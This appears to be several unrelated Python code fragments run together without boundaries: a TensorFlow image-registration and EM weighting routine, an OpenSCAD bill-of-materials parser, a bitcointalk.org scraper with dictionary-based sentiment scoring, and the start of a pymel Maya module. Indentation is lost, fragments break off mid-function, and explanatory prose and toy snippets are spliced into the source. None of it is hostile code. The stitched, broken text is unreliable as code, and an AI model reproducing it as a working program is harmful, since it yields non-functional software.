X2s = B[2,0]*X0J + B[2,1]*X1J + B[2,2]*X2J + B[2,3]
phiinvB0 = interp3(x0I, x1I, x2I, phiinv0 - X0I, X0s, X1s, X2s) + X0s
phiinvB1 = interp3(x0I, x1I, x2I, phiinv1 - X1I, X0s, X1s, X2s) + X1s
phiinvB2 = interp3(x0I, x1I, x2I, phiinv2 - X2I, X0s, X1s, X2s) + X2s
AphiI = interp3(x0I, x1I, x2I, I, phiinvB0, phiinvB1, phiinvB2)
################################################################################
# Calculate posterior probability weights that each pixel is an artifact or real data
WMsum = tf.reduce_sum(WM*W)
WMW = WM*W
WAW = WA*W
CA = tf.reduce_sum(J*WAW)/(tf.reduce_sum(WAW)+1.0e-6) # avoid divide by zero possibility
################################################################################
# build polynomial contrast transform
Is = tf.reshape(AphiI,[-1])
Js = tf.reshape(J,[-1])
WMWs = tf.reshape(WMW,[-1])
Basis = tf.stack( [Is**o for o in range(order+1)] ) # size O x N (order+1 by number of voxels)
# Basis times J (size Ox1)
BTJ = tf.reduce_mean(Basis * Js[None]*WMWs[None], axis=1)
# get basis times basis (size OxO)
BTB = tf.reduce_mean( Basis[:,None,:] * Basis[None,:,:] * WMWs[None,None], axis=2 )
coeffs = tf.matrix_solve(BTB,BTJ[:,None])
fAphiI = tf.zeros_like(Js)
for o in range(order+1):
fAphiI += (Is**o)*coeffs[o]
fAphiI = tf.reshape(fAphiI,nxJ)
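The `BTB`/`BTJ` solve above is weighted polynomial least squares written out by hand. A numpy restatement (toy data assumed) that can be cross-checked against `np.linalg.lstsq` on the sqrt-weighted design matrix:

```python
import numpy as np

rng = np.random.default_rng(1)
order = 2
Ivals = rng.uniform(0.0, 1.0, 200)            # "moving" image intensities
Jvals = 0.3 + 1.7 * Ivals - 0.5 * Ivals ** 2  # target intensities
w = rng.uniform(0.5, 1.0, 200)                # matching weights, like WM * W

Basis = np.stack([Ivals ** o for o in range(order + 1)])  # (order+1, N)
BTJ = (Basis * (Jvals * w)[None]).mean(axis=1)
BTB = (Basis[:, None, :] * Basis[None, :, :] * w[None, None]).mean(axis=2)
coeffs = np.linalg.solve(BTB, BTJ)

# same solution via least squares on the sqrt-weighted design matrix
ref, *_ = np.linalg.lstsq((Basis * np.sqrt(w)[None]).T,
                          Jvals * np.sqrt(w), rcond=None)
```

Using `mean` instead of `sum` (as the TF code does) rescales both sides of the normal equations by 1/N, so the solution is unchanged.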
################################################################################
# now we can update weights, this is the E step of the EM algorithm
WMnew = tf.exp( tf.pow(fAphiI - J, 2) * (-0.5/sigmaM2 ) ) * 1.0/np.sqrt(2.0*np.pi*sigmaM2)
WAnew = tf.exp( tf.pow(CA - J, 2) * (-0.5/sigmaA2 ) ) * 1.0/np.sqrt(2.0*np.pi*sigmaA2)
Wsum = WMnew + WAnew
Wsum = Wsum + tf.reduce_max(Wsum)*1e-6
WMnew = WMnew / Wsum
WAnew = WAnew / Wsum
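The E-step above in plain numpy, with assumed toy values: each pixel gets a posterior weight for "matching" (Gaussian around the predicted image) versus "artifact" (Gaussian around the constant CA), and the two weights are normalized to sum to one, up to the small guard against 0/0.

```python
import numpy as np

def e_step(pred, J, CA, sigmaM, sigmaA):
    wm = np.exp(-0.5 * (pred - J) ** 2 / sigmaM ** 2) / np.sqrt(2 * np.pi * sigmaM ** 2)
    wa = np.exp(-0.5 * (CA - J) ** 2 / sigmaA ** 2) / np.sqrt(2 * np.pi * sigmaA ** 2)
    wsum = wm + wa
    wsum = wsum + wsum.max() * 1e-6   # same divide-by-zero guard as the TF code
    return wm / wsum, wa / wsum

J = np.array([0.0, 1.0])     # observed pixels
pred = np.array([0.0, 0.0])  # model prediction, like f(A phi I)
WM, WA = e_step(pred, J, CA=1.0, sigmaM=0.1, sigmaA=0.1)
```

Pixel 0 matches the prediction, so its matching weight dominates; pixel 1 matches the artifact constant, so its artifact weight dominates.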
################################################################################
# get the energy of the flow and the sum of square error matching energy
if nt > 0:
ER = tf.reduce_sum(tf.stack(ERt))
else:
ER = tf.convert_to_tensor(0.0,dtype=tf.float64)
ER *= dt*dxI[0]*dxI[1]*dxI[2]/sigmaR2/2.0
# typically I would also divide by nx, but since I'm using reduce mean instead of reduce sum when summing over space, I do not
EM = tf.reduce_sum( tf.cast( tf.pow(fAphiI - J, 2)*WM*W, dtype=tf.float64) )/sigmaM2*dxI[0]*dxI[1]*dxI[2]/2.0
# artifact
EA = tf.reduce_sum( tf.cast( tf.pow(CA - J, 2)*WA*W, dtype=tf.float64) )/sigmaA2*dxI[0]*dxI[1]*dxI[2]/2.0
# let's just use these two for now
E = EM + ER
################################################################################
# now we compute the gradient with respect to affine transform parameters
# this is for right perturbations using matrix exponential parameterization
# i.e. A \mapsto A expm( e dA)
lambda1 = -WM*W*(fAphiI - J)/sigmaM2
fAphiI_0, fAphiI_1, fAphiI_2 = grad3(fAphiI, dxJ)
gradAcol = []
for r in range(3):
gradArow = []
for c in range(4):
#dA = tf.zeros(4)
#dA[r,c] = 1.0 # tensorflow does not support this kind of assignment
dA = np.zeros((4,4))
dA[r,c] = 1.0
AdAB = tf.matmul(tf.matmul(A, tf.convert_to_tensor(dA, dtype=dtype)), B)
AdAB0 = AdAB[0,0]*X0J + AdAB[0,1]*X1J + AdAB[0,2]*X2J + | |
#!/usr/bin/env python
# hardware/ci/parse.py
# Parse json from machine files, build hardware.json
import os
import shutil
import sys
import re
import json
import jsontools
import openscad
import syntax
try:
from types import DictType # Python 2
except ImportError:
DictType = dict # Python 3: types.DictType was removed
def parse_machines():
src_dir = '../'
logfile = 'openscad.log'
outfile = 'hardware.json'
oldfile = 'backup.json'
errorfile = 'invalid.json'
errorlevel = 0
print("Parse")
print("-----")
# load backup.json - to read cache values
oldjso = None
if os.path.isfile(oldfile):
jf = open(oldfile,"r")
oldjso = json.load(jf)
jf.close()
print("Looking for machine files...")
# reset error file
if os.path.isfile(errorfile):
os.remove(errorfile)
js = '[\n'
files = 0
for filename in os.listdir(src_dir):
if filename[-5:] == '.scad':
print(" Parsing: "+filename)
scadfile = src_dir + filename
if (files > 0):
js += ', '
s = ''
syn = syntax.check_syntax(scadfile,0)
if syn['errorLevel'] > 0:
errorlevel = syn['errorLevel']
else:
try:
s = parse_machine(scadfile, logfile, errorfile)
except:
errorlevel = 1
if (s > ''):
js += s
files += 1
js += ']';
# get rid of trailing commas
js = re.sub(r",(\s*(\}|\]))", r"\g<1>", js, flags=re.M) # 4th positional arg of re.sub is count, so pass flags by keyword
# parse
if errorlevel == 0:
try:
jso = json.loads(js)
print(" Parsed "+str(files)+" machine files")
summarise_files(jso, oldjso)
summarise_parts(jso, oldjso)
update_cache_info(jso, oldjso)
# prettify
js = json.dumps(jso, sort_keys=False, indent=4, separators=(',', ': '))
except Exception as e:
print(e)
errorlevel = 1
with open(outfile, 'w') as f:
f.write(js)
print("")
return errorlevel
def parse_machine(scadfile, logfile, errorfile):
openscad.run('-D','$ShowBOM=true','-o','dummy.csg',scadfile);
js = ''
errorlevel = 0
for line in open(logfile, "rt").readlines():
# errors
r = re.search(r".*syntax error$", line, re.I)
if r:
print(" Syntax error!")
print(line)
errorlevel = 2
continue
# echo lines
r = re.search(r'^.*ECHO\:\s\"(.*)\"$', line, re.I)
if r:
s = r.group(1)
# rewrite single quotes to double quotes, except for where they are used in words, e.g. isn't
s = re.sub(r"((\w)['](\W|$))","\g<2>\"\g<3>", s)
s = re.sub(r"((\W|^)['](\w))","\g<2>\"\g<3>", s)
s = re.sub(r"((\W)['](\W))","\g<2>\"\g<3>", s)
js += s + '\n'
if errorlevel == 0:
# Get rid of any empty objects
js = js.replace("{}","")
# get rid of trailing commas
js = re.sub(r",(\s*(\}|\]))","\g<1>", js)
js = re.sub(r",\s*$","", js)
try:
jso = json.loads(js)
# prettify
js = json.dumps(jso, sort_keys=False, indent=4, separators=(',', ': '))
except Exception as e:
print(e)
print("See "+errorfile+" for malformed json")
with open(errorfile, 'w') as f:
f.write(js)
# Stop malformed machine json screwing up everything else!
js = ''
else:
raise Exception("Syntax error")
return js
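The trailing-comma cleanup used in `parse_machine` can be exercised on its own. Note that `re.sub`'s fourth positional argument is `count`, so any flags must be passed by keyword:

```python
import json
import re

js = '{\n "a": 1,\n "b": [1, 2,\n ],\n}'
cleaned = re.sub(r",(\s*(\}|\]))", r"\g<1>", js, flags=re.M)
parsed = json.loads(cleaned)  # valid JSON once trailing commas are gone
```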
# File Summarisation
# ------------------
def in_files(fn, fs):
for f in fs:
if f['type'] == 'file' and f['file'] == fn:
return True
return False
def add_file(fn, fs):
if not in_files(fn, fs):
fs.append({ 'type':'file', 'file':fn })
def add_file_for(jso, fs):
if type(jso) is DictType:
if 'file' in jso:
add_file(jso['file'], fs)
if 'children' in jso:
for c in jso['children']:
add_file_for(c, fs)
def summarise_files(jso, oldjso):
print("Summarising files for all machines...")
fl = { 'type':'filelist', 'files':[] }
jso.append(fl)
fs = fl['files']
for m in jso:
add_file_for(m, fs)
print(" Found "+str(len(fs))+" files")
# Part Summarisation
# ------------------
def add_view(jso, o):
vfound = None
for v in o['views']:
if v['title'] == jso['title']:
vfound = v
break
if vfound is None:
o['views'].append(jso) # list.append returns None, so don't assign its result
def add_views_for(jso, o):
# check for views in children
for c in jso['children']:
if type(c) is DictType and c['type'] == 'view':
add_view(c, o)
def add_part(jso, o):
vfound = None
for v in o['parts']:
if v['title'] == jso['title']:
vfound = v
break
if vfound is None:
o['parts'].append(jso) # list.append returns None, so don't assign its result
def add_parts_for(jso, o):
# check for parts in children
for c in jso['children']:
if type(c) is DictType and c['type'] == 'part':
add_part(c, o)
def add_step(jso, o):
vfound = None
for v in o['steps']:
if v['num'] == jso['num']:
vfound = v
continue
if vfound == None:
vfound = {'num':jso['num'], 'desc':jso['desc'], 'views':[] }
o['steps'].append(vfound)
add_views_for(jso, vfound)
def add_steps_for(jso, o):
# check for steps in children
for c in jso['children']:
if type(c) is DictType and c['type'] == 'step':
add_step(c, o)
def add_vitamin(jso, vl, addViews=True, addParts=True):
#print(" Vitamin: "+jso['title'])
vfound = None
for v in vl:
if v['title'] == jso['title']:
vfound = v
continue
if vfound:
vfound['qty'] += 1
else:
vfound = { 'title':jso['title'], 'call':jso['call'], 'file':jso['file'], 'qty':1, 'views':[], 'parts':[] }
vl.append(vfound)
if addViews:
add_views_for(jso, vfound)
if addParts:
add_parts_for(jso, vfound)
def add_printed(jso, pl, addViews=True):
#print(" Printed Part: "+jso['title'])
pfound = None
for p in pl:
if p['title'] == jso['title']:
pfound = p
continue
if pfound:
pfound['qty'] += 1
else:
pfound = { 'title':jso['title'], 'call':jso['call'], 'file':jso['file'], 'qty':1, 'views':[] }
pl.append(pfound)
if addViews:
add_views_for(jso, pfound)
def add_cut(jso, cl, addSteps=True, addViews=True, addChildren=True):
afound = None
for a in cl:
if a['title'] == jso['title']:
afound = a
continue
if afound:
afound['qty'] += 1
else:
afound = {
'title':jso['title'], 'call':jso['call'], 'file':jso['file'],
'completeCall':jso['completeCall'],
'qty':1, 'views':[], 'steps':[], 'vitamins':[]
}
cl.append(afound)
if addViews:
add_views_for(jso, afound)
if addSteps:
add_steps_for(jso, afound)
nvl = afound['vitamins'];
# Collate immediate children, and sub-assemblies nested in steps!
if addChildren and 'children' in jso:
for c in jso['children']:
if type(c) is DictType:
tn = c['type']
if tn == 'vitamin':
add_vitamin(c, nvl, addViews=False)
if tn == 'step':
for sc in c['children']:
if type(sc) is DictType:
tn2 = sc['type']
if tn2 == 'vitamin':
add_vitamin(sc, nvl, addViews=False)
def add_assembly(jso, al, pl, vl, cl, addSteps=True, addViews=True, addChildren=True, level=0):
#print(" Assembly: "+jso['title'])
#print(" Level: "+str(level))
afound = None
for a in al:
if a['title'] == jso['title']:
afound = a
continue
if afound:
afound['level'] = max(afound['level'], level)
afound['qty'] += 1
else:
afound = {
'title':jso['title'], 'call':jso['call'], 'file':jso['file'], 'level':level,
'qty':1, 'views':[], 'steps':[], 'assemblies':[], 'vitamins':[], 'printed':[], 'cut':[]
}
al.append(afound)
if addViews:
add_views_for(jso, afound)
if addSteps:
add_steps_for(jso, afound)
nvl = afound['vitamins'];
nal = afound['assemblies'];
npl = afound['printed'];
ncl = afound['cut'];
# Collate immediate children, and sub-assemblies nested in steps!
nextlevel = level + 1
if addChildren and 'children' in jso:
for c in jso['children']:
if type(c) is DictType:
tn = c['type']
if tn == 'vitamin':
add_vitamin(c, nvl, addViews=False)
if tn == 'assembly':
add_assembly(c, nal, npl, nvl, ncl, addSteps=False, addViews=False, addChildren=False, level=nextlevel)
if tn == 'cut':
add_cut(c, ncl, addViews=False, addSteps=False, addChildren=False)
if tn == 'printed':
add_printed(c, npl, addViews=False)
if tn == 'step':
for sc in c['children']:
if type(sc) is DictType:
tn2 = sc['type']
if tn2 == 'vitamin':
add_vitamin(sc, nvl, addViews=False)
if tn2 == 'assembly':
add_assembly(sc, nal, npl, nvl, ncl, addSteps=False, addViews=False, addChildren=False, level=nextlevel)
if tn2 == 'printed':
add_printed(sc, npl, addViews=False)
                            if tn2 == 'cut':
                                add_cut(sc, ncl, addViews=False, addSteps=False, addChildren=False)
def summarise_parts_for(jso, al, pl, vl, cl, level=0):
# print("sum_parts_for "+str(level))
if type(jso) is DictType:
tn = jso['type']
if tn == 'vitamin':
add_vitamin(jso, vl)
if tn == 'assembly':
add_assembly(jso, al, pl, vl, cl, level=level)
if tn == 'cut':
add_cut(jso, cl)
if tn == 'printed':
add_printed(jso, pl)
if 'children' in jso:
for c in jso['children']:
summarise_parts_for(c, al, pl, vl, cl, level+1)
def summarise_parts(jso, oldjso):
print("Summarising parts for each machine...")
for m in jso:
if type(m) is DictType and m['type'] == 'machine':
print(" "+m['title']+"...")
al = m['assemblies'] = []
cl = m['cut'] = []
pl = m['printed'] = []
vl = m['vitamins'] = []
for c in m['children']:
summarise_parts_for(c, al, pl, vl, cl, 0)
print(" Found:")
print(" "+str(len(al))+" assemblies")
print(" "+str(len(cl))+" cut parts")
print(" "+str(len(pl))+" printed parts")
print(" "+str(len(vl))+" vitamins")
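The collation above walks each machine's JSON tree and tallies parts by title. A minimal, self-contained sketch of that idea (the tree below is hypothetical, and only vitamins are tallied for brevity):

```python
def tally_vitamins(node, tally=None):
    """Recursively count 'vitamin' nodes by title, in the spirit of
    add_vitamin/summarise_parts_for (simplified sketch, not the real API)."""
    if tally is None:
        tally = {}
    if isinstance(node, dict):
        if node.get('type') == 'vitamin':
            tally[node['title']] = tally.get(node['title'], 0) + 1
        for child in node.get('children', []):
            tally_vitamins(child, tally)
    return tally

# Hypothetical part tree: an assembly with a direct vitamin, a step
# containing a nested vitamin, and one more direct vitamin.
tree = {
    'type': 'assembly', 'title': 'Frame',
    'children': [
        {'type': 'vitamin', 'title': 'M3x10 screw'},
        {'type': 'step', 'children': [{'type': 'vitamin', 'title': 'M3x10 screw'}]},
        {'type': 'vitamin', 'title': 'M3 nut'},
    ],
}
print(tally_vitamins(tree))  # {'M3x10 screw': 2, 'M3 nut': 1}
```

The real code does the same walk but keeps separate lists for assemblies, cut parts, printed parts and vitamins, and also merges views and steps per entry.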
# Update Cache
# ------------
def update_cache_info_for(vl, ovl):
    if vl is None or ovl is None:
return
for v in vl:
if type(v) is DictType and 'title' in v:
print(" "+v['title'])
# find match in ovl
oldv = None
            for ov in ovl:
                if type(ov) is DictType and 'title' in ov and ov['title'] == v['title']:
                    oldv = ov
                    break
if oldv:
# merge json info
jsontools.json_merge_missing_keys(v, oldv)
""" Module for requesting data from bitcointalk.org and parsing it. """
import codecs
from datetime import date
from datetime import datetime
from datetime import time as tm
import HTMLParser
import json
import logging
import lxml.html
import requests
import os
from random import random
import re
import sys
import time
import unittest
import nltk
import pandas
baseUrl = "https://bitcointalk.org/index.php"
countRequested = 0
interReqTime = 2
lastReqTime = None
nltk.download('stopwords')
sr = nltk.corpus.stopwords.words('english')
lmdict = pandas.read_excel(os.path.join(os.getcwd(), 'LoughranMcDonald_MasterDictionary_2014.xlsx'))
neg_words = lmdict.loc[lmdict.Negative != 0, 'Word'].str.lower().unique()
pos_words = lmdict.loc[lmdict.Positive != 0, 'Word'].str.lower().unique()
def computeSentiment(text):
# Tokenize and remove stop words
tokens = []
for t in nltk.regexp_tokenize(text.lower(), '[a-z]+'):
if t not in sr:
tokens.append(t)
# Count the number of positive and negative words.
pos_count = 0
neg_count = 0
for t in tokens:
if t in pos_words:
pos_count += 1
elif t in neg_words:
neg_count += 1
# Compute sentiment
if (pos_count + neg_count) > 0:
sentiment = float(pos_count - neg_count)/float(pos_count + neg_count)
else:
sentiment = 0
return sentiment
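The ratio computed above can be sketched without the NLTK and Loughran-McDonald dependencies; the tiny word lists here are placeholders standing in for the real dictionary and stop-word set:

```python
import re

# Hypothetical stand-ins for the Loughran-McDonald word lists and stop words.
POS = {'gain', 'profit', 'good'}
NEG = {'loss', 'fraud'}
STOP = {'the', 'a', 'is'}

def sentiment(text):
    """(pos - neg) / (pos + neg) over non-stop-word tokens, as in computeSentiment."""
    tokens = [t for t in re.findall('[a-z]+', text.lower()) if t not in STOP]
    pos = sum(t in POS for t in tokens)
    neg = sum(t in NEG for t in tokens)
    return float(pos - neg) / (pos + neg) if (pos + neg) else 0.0

print(sentiment("The gain is good despite a loss"))  # (2 - 1) / 3 ≈ 0.333
```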
def _request(payloadString):
"""Private method for requesting an arbitrary query string."""
global countRequested
global lastReqTime
if lastReqTime is not None and time.time() - lastReqTime < interReqTime:
timeToSleep = random()*(interReqTime-time.time()+lastReqTime)*2
logging.info("Sleeping for {0} seconds before request.".format(
timeToSleep))
time.sleep(timeToSleep)
logging.info("Issuing request for the following payload: {0}".format(
payloadString))
r = {}
for i in range(0, 20):
try:
r = requests.get("{0}?{1}".format(baseUrl, payloadString))
break
except Exception as e:
if i == 19:
raise e
time.sleep(1)
continue
lastReqTime = time.time()
countRequested += 1
if r.status_code == requests.codes.ok:
return r.text
else:
raise Exception("Could not process request. \
Received status code {0}.".format(r.status_code))
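The retry pattern inside `_request` (try up to 20 times, re-raise only when every attempt has failed) can be isolated as a small sketch; the inter-attempt sleep is omitted here so it stays testable:

```python
def retry(func, attempts=20):
    """Call func until it succeeds, re-raising the exception only on the
    final attempt -- the same shape as the loop in _request (sleep omitted)."""
    for i in range(attempts):
        try:
            return func()
        except Exception:
            if i == attempts - 1:
                raise

# A hypothetical flaky callable that fails twice, then succeeds.
calls = {'n': 0}
def flaky():
    calls['n'] += 1
    if calls['n'] < 3:
        raise IOError("transient failure")
    return "ok"

print(retry(flaky))  # "ok", after two failed attempts
```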
def requestBoardPage(boardId, topicOffset=0):
    """Method for requesting a board."""
    return _request("board={0}.{1}".format(boardId, topicOffset))
def requestProfile(memberId):
"""Method for requesting a profile."""
return _request("action=profile;u={0}".format(memberId))
def requestTopicPage(topicId, messageOffset=0):
    """Method for requesting a topic page.

    CAVEAT: a single request will return only 20 messages.
    """
return _request("topic={0}.{1}".format(topicId, messageOffset))
def requestTopicPageAll(topicId):
    """Method for requesting a topic page, returning ALL messages."""
return _request("topic={0}.0;all".format(topicId))
def parseBoardPage(html):
"""Method for parsing board HTML. Will extract topic IDs."""
data = {}
# Extract name
docRoot = lxml.html.fromstring(html)
data['name'] = docRoot.cssselect("title")[0].text
# Parse through board hierarchy
bodyArea = docRoot.cssselect("#bodyarea")[0]
linkNodes = bodyArea.cssselect("div > div > div")[0].cssselect("a.nav")
data['container'] = None
data['parent'] = None
for linkNode in linkNodes:
link = linkNode.attrib["href"]
linkText = linkNode.text
linkSuffix = link.split(baseUrl)[1]
# If this is the top level of the board continue
if linkSuffix == '':
continue
# If this is the container (second to the top level)
elif linkSuffix[0] == '#':
data['container'] = linkText
# If we have something between the board and the container
elif linkText != data['name']:
data['parent'] = int(linkSuffix[7:].split(".")[0])
elif linkText == data['name']:
data['id'] = int(linkSuffix[7:].split(".")[0])
# Parse number of pages
data['num_pages'] = 0
pageNodes = bodyArea.cssselect(
"#bodyarea>table td.middletext>a,#bodyarea>table td.middletext>b")
for pageNode in pageNodes:
if pageNode.text == " ... " or pageNode.text == "All":
continue
elif int(pageNode.text) > data['num_pages']:
data["num_pages"] = int(pageNode.text)
# Parse the topic IDs
topicIds = []
topics = docRoot.cssselect(
"#bodyarea>div.tborder>table.bordercolor>tr")
for topic in topics:
# print topic.text_content()
topicCells = topic.cssselect("td")
if len(topicCells) != 7:
continue
topicLinks = topicCells[2].cssselect("span>a")
if len(topicLinks) > 0:
linkPayload = topicLinks[0].attrib['href'].replace(
baseUrl, '')[1:]
if linkPayload[0:5] == 'topic':
topicIds.append(int(linkPayload[6:-2]))
data['topic_ids'] = topicIds
return data
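The topic IDs collected above come from link payloads of the form `topic=<id>.<offset>`; the original slicing (`linkPayload[6:-2]`) assumes a trailing `.0`. A small sketch of a split-based equivalent that tolerates any page offset:

```python
def topic_id(link_payload):
    """Extract the numeric topic ID from a 'topic=<id>.<offset>' payload."""
    return int(link_payload.split('=')[1].split('.')[0])

print(topic_id("topic=96118.0"))    # 96118
print(topic_id("topic=684343.40"))  # 684343
```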
def parseProfile(html, todaysDate=None):
    """Method for parsing profile HTML."""
    # Evaluate the default at call time, not at import time.
    if todaysDate is None:
        todaysDate = datetime.utcnow().date()
    data = {}
docRoot = lxml.html.fromstring(html)
# Pull the member ID
pLink = docRoot.cssselect("#bodyarea td.windowbg2 > a")[0].attrib['href']
data['id'] = int(pLink.split("u=")[1].split(";")[0])
# Pull associated information
infoTable = docRoot.cssselect("#bodyarea td.windowbg > table")[0]
infoRows = infoTable.cssselect("tr")
labelMapping = {
"Name: ": "name",
"Position: ": "position",
"Date Registered: ": "date_registered",
"Last Active: ": "last_active",
"Email: ": "email",
"Website: ": "website_name",
"Bitcoin Address: ": "bitcoin_address",
"Other contact info: ": "other_contact_info"
}
for label, key in labelMapping.iteritems():
data[key] = None
data['website_link'] = None
data['signature'] = None
for row in infoRows:
columns = row.cssselect("td")
if len(columns) != 2:
signature = row.cssselect("div.signature")
if len(signature) == 0:
continue
else:
sigText = lxml.html.tostring(signature[0])
sigText = sigText.split('<div class="signature">')[1]
sigText = sigText.split('</div>')[0]
data['signature'] = sigText
else:
label = columns[0].text_content()
if label in labelMapping:
data[labelMapping[label]] = columns[1].text_content().strip()
if label == "Website: ":
linkNode = columns[1].cssselect("a")[0]
data['website_link'] = linkNode.attrib['href']
elif label == "Date Registered: " or label == "Last Active: ":
data[labelMapping[label]] = data[labelMapping[label]].replace(
"Today at", todaysDate.strftime("%B %d, %Y,"))
data[labelMapping[label]] = datetime.strptime(
data[labelMapping[label]], "%B %d, %Y, %I:%M:%S %p")
return data
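The "Today at" handling used for the date fields above can be sketched on its own: the literal prefix is swapped for today's date so `strptime` sees a complete timestamp (function name here is illustrative, not part of the module):

```python
from datetime import date, datetime

def parse_forum_time(raw, today):
    """Normalise a bitcointalk timestamp, resolving the 'Today at' prefix."""
    raw = raw.replace("Today at", today.strftime("%B %d, %Y,"))
    return datetime.strptime(raw, "%B %d, %Y, %I:%M:%S %p")

print(parse_forum_time("Today at 03:15:42 PM", date(2014, 7, 29)))
# 2014-07-29 15:15:42
```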
def parseTopicPage(html, todaysDate=None):
    """Method for parsing topic HTML. Will extract messages."""
    # Evaluate the default at call time, not at import time.
    if todaysDate is None:
        todaysDate = datetime.utcnow().date()
    data = {}
h = HTMLParser.HTMLParser()
docRoot = lxml.html.fromstring(html)
# Parse the topic name
data['name'] = docRoot.cssselect("title")[0].text
# Parse through board hierarchy for the containing board ID and topic ID
bodyArea = docRoot.cssselect("#bodyarea")[0]
nestedDiv = bodyArea.cssselect("div > div > div")
if len(nestedDiv) == 0:
raise Exception("Page does not have valid topic data.")
linkNodes = nestedDiv[0].cssselect("a.nav")
for linkNode in linkNodes:
link = linkNode.attrib["href"]
linkText = linkNode.text
linkSuffix = link.split(baseUrl)[1]
if linkSuffix == '' or linkSuffix[0] == '#':
continue
elif linkSuffix[0:6] == "?board":
data['board'] = int(linkSuffix[7:].split(".")[0])
elif linkText == data['name']:
data['id'] = int(linkSuffix[7:].split(".")[0])
# Parse the total count of pages in the topic
data['num_pages'] = 0
pageNodes = bodyArea.cssselect(
"#bodyarea>table td.middletext>a,#bodyarea>table td.middletext>b")
for pageNode in pageNodes:
if pageNode.text == " ... " or pageNode.text == "All":
continue
elif int(pageNode.text) > data['num_pages']:
data["num_pages"] = int(pageNode.text)
# Parse the read count
tSubj = docRoot.cssselect("td#top_subject")[0].text.strip()
data['count_read'] = int(tSubj.split("(Read ")[-1].split(" times)")[0])
# Parse the messages
messages = []
firstPostClass = None
posts = docRoot.cssselect(
"form#quickModForm>table.bordercolor>tr")
first = True
for post in posts:
if firstPostClass is None:
firstPostClass = post.attrib["class"]
if ("class" not in post.attrib or
post.attrib["class"] != firstPostClass):
continue
else:
m = {}
m['topic'] = data['id']
innerPost = post.cssselect("td td.windowbg,td.windowbg2 tr")[0]
# Parse the member who's made the post
userInfoPossible = innerPost.cssselect("td.poster_info>b>a")
if len(userInfoPossible) > 0:
userInfo = innerPost.cssselect("td.poster_info>b>a")[0]
userUrlPrefix = "{0}?action=profile;u=".format(baseUrl)
m['member'] = int(userInfo.attrib["href"].split(
userUrlPrefix)[-1])
# If no links, then we have a guest
else:
m['member'] = 0
# Parse label information about the post
subj = innerPost.cssselect(
"td.td_headerandpost>table>tr>td>div.subject>a")[0]
if first:
data['subject'] = subj.text
first = False
m['link'] = subj.attrib['href']
m['id'] = long(m['link'].split('#msg')[-1])
# Parse the message post time
postTime = innerPost.cssselect(
"td.td_headerandpost>table>tr>td>div.smalltext")[0]
m['post_time'] = postTime.text_content().strip().replace(
"Today at", todaysDate.strftime("%B %d, %Y,"))
m['post_time'] = datetime.strptime(
m['post_time'], "%B %d, %Y, %I:%M:%S %p")
# Parse the topic position
messageNumber = innerPost.cssselect(
"td.td_headerandpost>table>tr>td>div>a.message_number")[0]
m['topic_position'] = int(messageNumber.text[1:])
# Extract the content
corePost = innerPost.cssselect("div.post")[0]
for child in corePost.iterchildren():
if (child.tag == "div" and 'class' in child.attrib and
(child.attrib['class'] == 'quoteheader' or
child.attrib['class'] == 'quote')):
corePost.remove(child)
m['content_no_quote_no_html'] = corePost.text_content()
m['sentiment'] = computeSentiment(m['content_no_quote_no_html'])
messages.append(m)
data['messages'] = messages
return data
class BitcointalkTest(unittest.TestCase):
    """Testing suite for bitcointalk module."""
def testRequestBoardPage(self):
        """Method for testing requestBoardPage."""
html = requestBoardPage(74)
f = codecs.open("{0}/data/test_board_74.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
title = lxml.html.fromstring(html).cssselect("title")[0].text
errorMsg = "Got unexpected output for webpage title: {0}".format(title)
self.assertEqual(title, "Legal", errorMsg)
html = requestBoardPage(5, 600)
f = codecs.open("{0}/data/test_board_5.600.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
def testRequestProfile(self):
"""Method for testing requestProfile."""
html = requestProfile(12)
f = codecs.open("{0}/data/test_profile_12.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
title = lxml.html.fromstring(html).cssselect("title")[0].text
errorMsg = "Got unexpected output for webpage title: {0}".format(title)
self.assertEqual(title, "View the profile of nanaimogold", errorMsg)
def testRequestTopicPage(self):
"""Method for testing requestTopicPage."""
html = requestTopicPage(14)
f = codecs.open("{0}/data/test_topic_14.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
title = lxml.html.fromstring(html).cssselect("title")[0].text
errorMsg = "Got unexpected output for webpage title: {0}".format(title)
self.assertEqual(title, "Break on the supply's increase", errorMsg)
html = requestTopicPage(602041, 12400)
f = codecs.open("{0}/data/test_topic_602041.12400.html".format(
os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')
f.write(html)
f.close()
def testParseBoardPage(self):
"""Method for testing parseBoardPage."""
f = codecs.open("{0}/example/board_74.html".format(
os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')
html = f.read()
f.close()
data = parseBoardPage(html)
topicIds = data.pop("topic_ids")
expectedData = {
'id': 74,
'name': 'Legal',
'container': 'Bitcoin',
'parent': 1,
'num_pages': 23,
}
self.assertEqual(data, expectedData)
self.assertEqual(len(topicIds), 40)
self.assertEqual(topicIds[0], 96118)
self.assertEqual(topicIds[-1], 684343)
f = codecs.open("{0}/example/board_5.600.html".format(
os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')
html = f.read()
f.close()
data = parseBoardPage(html)
topicIds = data.pop("topic_ids")
expectedData = {
'id': 5,
'name': 'Marketplace',
'container': 'Economy',
'parent': None,
'num_pages': 128,
}
self.assertEqual(data, expectedData)
self.assertEqual(len(topicIds), 40)
self.assertEqual(topicIds[0], 423880)
self.assertEqual(topicIds[-1], 430401)
def testParseProfile(self):
"""Method for testing parseProfile."""
f = codecs.open("{0}/example/profile_12.html".format(
os.path.dirname(os.path.abspath(__file__))), 'r', 'utf-8')
html = f.read()
f.close()
todaysDate = date(2014, 7, 29)
data = parseProfile(html, todaysDate)
expectedData = {
'id': 12,
'name': 'nanaimogold',
'position': 'Sr. Member',
'date_registered': datetime(2009, 12, 9, 19, 23, 55),
'last_active': datetime(2014, 7, 29, 0, 38, 1),
'email': 'hidden',
'website_name': 'Nanaimo Gold Digital Currency Exchange',
'website_link': 'https://www.nanaimogold.com/',
"""Functions to create and connect nodes."""
import pymel.core as pm
from pymel import versions
import pymel.core.datatypes as datatypes
from . import attribute
#############################################
# CREATE SIMPLE NODES
#############################################
def createMultMatrixNode(mA, mB, target=False, transform='srt'):
"""Create Maya multiply Matrix node.
Note:
This node have same functionality as the default Maya matrix
multiplication.
Arguments:
mA (matrix): input matrix A.
